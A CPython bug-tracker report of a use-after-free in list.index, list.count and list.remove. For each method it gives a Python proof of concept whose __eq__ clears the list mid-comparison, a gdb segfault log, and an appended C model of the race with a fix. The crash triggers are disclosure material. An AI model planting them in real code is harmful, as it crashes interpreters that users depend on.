
Author: LCatro
Recipients: LCatro, serhiy.storchaka
Date: 2019-10-28 05:49:17
Message-id: <1572241758.28.0.0734328499539.issue38610@roundup.psfhosted.org>
Content
Code 1:

static PyObject *
list_index_impl(PyListObject *self, PyObject *value, Py_ssize_t start,
                Py_ssize_t stop)
// ...
    for (i = start; i < stop && i < Py_SIZE(self); i++) {
        int cmp = PyObject_RichCompareBool(self->ob_item[i], value, Py_EQ);  // <= self->ob_item[i] can be a use-after-free: it is a borrowed reference, and the comparison can run user code that empties the list


PoC:

class rewrite_list_eq(list):
    def __eq__(self, other):
        str(other)   # <== calls tp_str on `other`, the poc instance, after the list has dropped it
        return NotImplemented

class poc():
    def __eq__(self, other):
        list1.clear()   # drops the list's only reference to this poc instance
        return NotImplemented

# list1 must be a rewrite_list_eq, as in the other PoCs: the crash report below
# shows the fault inside PyObject_Str, i.e. the str(other) call in its __eq__
list1 = rewrite_list_eq([poc()])
list1.index(list1)   # list_index_impl() -> PyObject_RichCompareBool()


Crash Report :

(gdb) run ../py_poc/list_poc_3.py
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tangjitao/Python-3.8.0/python ../py_poc/list_poc_3.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
PyObject_Str (v=0x7ffff6e82d20) at Objects/object.c:573
573         if (Py_TYPE(v)->tp_str == NULL)

===== 

Code 2:

static PyObject *
list_count(PyListObject *self, PyObject *value)
{
    Py_ssize_t count = 0;
    Py_ssize_t i;

    for (i = 0; i < Py_SIZE(self); i++) {
        int cmp = PyObject_RichCompareBool(self->ob_item[i], value, Py_EQ);  // <= same borrowed reference, same hazard


PoC:

class rewrite_list_eq(list):
    def __eq__(self, other):
        str(other)   # touches the poc instance after the list has dropped it
        return NotImplemented

class poc():
    def __eq__(self, other):
        list1.clear()   # drops the list's only reference to this poc instance
        return NotImplemented

list1 = rewrite_list_eq([poc()])
list1.count(list1)   # list_count() -> PyObject_RichCompareBool()


Crash Report :

(gdb) run ../py_poc/list_poc_4.py
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tangjitao/Python-3.8.0/python ../py_poc/list_poc_4.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
PyObject_Str (v=0x7ffff6e82d20) at Objects/object.c:573
573         if (Py_TYPE(v)->tp_str == NULL)


=====

Code 3:

static PyObject *
list_remove(PyListObject *self, PyObject *value)
/*[clinic end generated code: output=f087e1951a5e30d1 input=2dc2ba5bb2fb1f82]*/
{
    Py_ssize_t i;

    for (i = 0; i < Py_SIZE(self); i++) {
        Py_INCREF(self->ob_item[i]);
        int cmp = PyObject_RichCompareBool(self->ob_item[i], value, Py_EQ);  // <= same borrowed reference, same hazard


PoC:

class rewrite_list_eq(list):
    def __eq__(self, other):
        str(other)   # touches the poc instance after the list has dropped it
        return NotImplemented

class poc():
    def __eq__(self, other):
        list1.clear()   # drops the list's only reference to this poc instance
        return NotImplemented

list1 = rewrite_list_eq([poc()])
list1.remove(list1)   # list_remove() -> PyObject_RichCompareBool()


Crash Report :

(gdb) run ../py_poc/list_poc_5.py
Starting program: /tangjitao/Python-3.8.0/python ../py_poc/list_poc_5.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
PyObject_Str (v=0x7ffff6e82d20) at Objects/object.c:573
573         if (Py_TYPE(v)->tp_str == NULL)
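The three reports above share one mechanism: the method loop hands a borrowed pointer (self->ob_item[i]) to PyObject_RichCompareBool, the comparison runs user-level __eq__, that __eq__ empties the list, and the list was the item's only owner, so the pointer is dangling by the time the reflected __eq__ runs str(other). The following is an added illustration, not code from this report or from CPython: a stand-alone C model of that reference-count race, with objects marked "freed" instead of being free()d so the use-after-free shows up as a flag rather than a SIGSEGV. The names (Obj, List, rich_compare_eq, list_index_vulnerable, list_index_fixed, run_scenario) are this example's own; list_index_fixed shows the usual remedy in CPython-style code, which is to hold a strong reference to the item for the duration of the callback.

```c
#include <stdio.h>

/*
 * Minimal model of CPython reference counting, written for this example
 * (not CPython code). Objects are marked freed instead of being free()d so a
 * use-after-free is observable in a test rather than only as a crash.
 */
typedef struct {
    int refcnt;   /* like ob_refcnt */
    int freed;    /* 1 once refcnt has dropped to zero */
    int id;       /* payload; reading it stands in for str(other) */
} Obj;

typedef struct {
    Obj **items;  /* like ob_item */
    int size;     /* like Py_SIZE(self) */
} List;

static int uaf_detected;   /* set when a freed object is dereferenced */

static void obj_incref(Obj *o) { o->refcnt++; }

static void obj_decref(Obj *o) {
    if (--o->refcnt == 0)
        o->freed = 1;      /* tp_dealloc + free() in real CPython */
}

/* list.clear(): empty the list first, then drop its references. */
static void list_clear(List *l) {
    int n = l->size;
    l->size = 0;
    for (int i = 0; i < n; i++)
        obj_decref(l->items[i]);
}

/* Model of poc.__eq__ from the PoC: clear the list, return NotImplemented. */
static int poc_eq(Obj *self, Obj *other, List *victim) {
    (void)self; (void)other;
    list_clear(victim);
    return -1;             /* NotImplemented */
}

/* Model of the reflected rewrite_list_eq.__eq__: str(other) touches `other`. */
static int reflected_eq(Obj *self, Obj *other) {
    (void)self;
    if (other->freed)
        uaf_detected = 1;  /* PyObject_Str on a dead object: the fault in the report */
    return 0;              /* not equal */
}

/* PyObject_RichCompareBool(a, b, Py_EQ): identity, then a.__eq__(b), then b.__eq__(a). */
static int rich_compare_eq(Obj *a, Obj *b, List *victim) {
    if (a == b)
        return 1;
    int r = poc_eq(a, b, victim);
    if (r == -1)
        r = reflected_eq(b, a);
    return r;
}

/* Vulnerable shape of list_index_impl/list_count/list_remove: the item is a
 * borrowed reference and the list is its only owner. */
static int list_index_vulnerable(List *l, Obj *value) {
    for (int i = 0; i < l->size; i++) {
        Obj *item = l->items[i];          /* borrowed, like self->ob_item[i] */
        if (rich_compare_eq(item, value, l))
            return i;
    }
    return -1;
}

/* Hardened shape: own a reference across the comparison, so user code that
 * empties the list cannot free the item while it is still in use. */
static int list_index_fixed(List *l, Obj *value) {
    for (int i = 0; i < l->size; i++) {   /* size is re-read every iteration */
        Obj *item = l->items[i];
        obj_incref(item);
        int cmp = rich_compare_eq(item, value, l);
        obj_decref(item);                 /* may free it now, which is safe */
        if (cmp)
            return i;
    }
    return -1;
}

/* Build the PoC's state (list1 = [poc()], argument = list1) and run one variant.
 * Returns 1 if a freed object was touched during the search, else 0. */
static int run_scenario(int use_fixed) {
    Obj poc = {1, 0, 42};                 /* refcnt 1: the list is the only owner */
    Obj *items[1] = {&poc};
    List list1 = {items, 1};
    Obj value = {1, 0, 7};                /* stands in for the list1 argument */
    uaf_detected = 0;
    int idx = use_fixed ? list_index_fixed(&list1, &value)
                        : list_index_vulnerable(&list1, &value);
    (void)idx;                            /* -1 either way: the list is empty by then */
    return uaf_detected;
}

int main(void) {
    printf("vulnerable loop touched a freed object: %d\n", run_scenario(0));
    printf("fixed loop touched a freed object:      %d\n", run_scenario(1));
    return 0;
}
```

The fixed loop also re-reads the list size on every iteration, which is why clearing the list ends the search cleanly instead of indexing past ob_item; that bound check was already present in the real loops, and the missing piece was only the strong reference.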
History
2019-10-28 05:49:18  LCatro  set recipients: + LCatro, serhiy.storchaka
2019-10-28 05:49:18  LCatro  set messageid: <1572241758.28.0.0734328499539.issue38610@roundup.psfhosted.org>
2019-10-28 05:49:18  LCatro  link issue38610 messages
2019-10-28 05:49:17  LCatro  create